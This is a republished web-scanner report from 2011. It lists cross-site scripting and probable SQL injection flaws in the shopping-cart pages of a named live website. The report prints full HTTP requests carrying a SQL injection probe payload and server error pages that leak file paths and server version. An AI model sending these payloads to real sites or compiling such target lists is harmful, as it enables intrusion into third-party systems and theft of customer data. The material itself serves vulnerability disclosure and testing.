Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting in onlinemicrofiche.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
https://www.onlinemicrofiche.com/xtremepowers...
SCAN DATE
5/2/2011 2:17:40 AM
REPORT DATE
5/2/2011 12:12:22 PM
SCAN DURATION
00:49:24

Total Requests

Average Speed

req/sec.
74
identified
61
confirmed
10
critical
2
informational

DORK TESTS

DORK TESTS
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
14 %
IMPORTANT
76 %
LOW
8 %
INFORMATION
3 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/xtremepowersports/shoppingcart/ Forbidden Resource Yes
IIS Version Disclosure No
/xtremepowersports/shoppingcart/CheckOut/Navigation.asp Cookie Not Marked As Secure Yes
Type GET Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
TRACE / TRACK Identified Yes
/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp txtEmail POST [Probable] SQL Injection No
txtEmail POST [Probable] SQL Injection No
txtEmail POST [Probable] SQL Injection No
txtAddress1 POST Cross-site Scripting Yes
txtAddress2 POST Cross-site Scripting Yes
txtAltPhone POST Cross-site Scripting Yes
txtBusinessName POST Cross-site Scripting Yes
txtCity POST Cross-site Scripting Yes
txtCountry POST Cross-site Scripting Yes
txtEmail POST Cross-site Scripting Yes
txtFax POST Cross-site Scripting Yes
txtFirstName POST Cross-site Scripting Yes
txtHint POST Cross-site Scripting Yes
txtLastName POST Cross-site Scripting Yes
txtMiddleIntial POST Cross-site Scripting Yes
txtpassword POST Cross-site Scripting Yes
txtpassword2 POST Cross-site Scripting Yes
txtPhone POST Cross-site Scripting Yes
txtZip POST Cross-site Scripting Yes
txtpassword POST Cross-site Scripting Yes
txtpassword2 POST Cross-site Scripting Yes
txtHint POST Cross-site Scripting Yes
txtFirstName POST Cross-site Scripting Yes
txtLastName POST Cross-site Scripting Yes
txtMiddleIntial POST Cross-site Scripting Yes
txtBusinessName POST Cross-site Scripting Yes
txtAddress1 POST Cross-site Scripting Yes
txtAddress2 POST Cross-site Scripting Yes
txtCity POST Cross-site Scripting Yes
txtZip POST Cross-site Scripting Yes
txtCountry POST Cross-site Scripting Yes
txtPhone POST Cross-site Scripting Yes
txtAltPhone POST Cross-site Scripting Yes
txtFax POST Cross-site Scripting Yes
txtEmail POST Cross-site Scripting Yes
txtpassword POST Cross-site Scripting Yes
txtpassword2 POST Cross-site Scripting Yes
txtHint POST Cross-site Scripting Yes
txtFirstName POST Cross-site Scripting Yes
txtLastName POST Cross-site Scripting Yes
txtMiddleIntial POST Cross-site Scripting Yes
txtBusinessName POST Cross-site Scripting Yes
txtAddress1 POST Cross-site Scripting Yes
txtAddress2 POST Cross-site Scripting Yes
txtCity POST Cross-site Scripting Yes
txtZip POST Cross-site Scripting Yes
txtCountry POST Cross-site Scripting Yes
txtPhone POST Cross-site Scripting Yes
txtAltPhone POST Cross-site Scripting Yes
txtFax POST Cross-site Scripting Yes
txtEmail POST Cross-site Scripting Yes
Auto Complete Enabled Yes
txtEmail POST Database Error Message No
cmbAdvert POST Programming Error Message No
/xtremepowersports/shoppingcart/hold/ProcessHold.asp txtEmail POST [Probable] SQL Injection No
txtPassword POST [Probable] SQL Injection No
txtEmail POST [Probable] SQL Injection No
txtPassword POST [Probable] SQL Injection No
txtEmail POST Cross-site Scripting Yes
txtPassword POST Cross-site Scripting Yes
txtEmail POST Cross-site Scripting Yes
txtPassword POST Cross-site Scripting Yes
/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp txtEmail POST [Probable] SQL Injection No
txtEmail POST [Probable] SQL Injection No
txtEmail POST Cross-site Scripting Yes
txtEmail POST Cross-site Scripting Yes
/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp txtPartNoAdd POST [Probable] SQL Injection No
txtPartNoAdd POST Cross-site Scripting Yes
[Probable] SQL Injection

[Probable] SQL Injection

10 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 422
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:33:25 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:33:26 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

POST /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 181
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:33:39 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:33:40 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp <br>ASP Line: 133 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 415
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&cmbAdvert=7

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:46 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:49:47 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

Parameters

Parameter Type Value
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

POST /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 162
Accept-Encoding: gzip, deflate

txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:56:42 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:56:42 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp <br>ASP Line: 133 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 392
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:58:32 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:58:33 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
txtPassword POST 3
Type POST 21

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 203
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&txtPassword=3&Type=21

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:00:04 GMT
Content-Length: 1335
Content-Type: text/html
Expires: Mon, 02 May 2011 04:00:05 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST netsparker@example.com
txtPassword POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Type POST 21

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 226
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail=netsparker%40example.com&txtPassword='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&Type=21

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:00:41 GMT
Content-Length: 1335
Content-Type: text/html
Expires: Mon, 02 May 2011 04:00:42 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Type POST 21
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
txtPassword POST 3

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
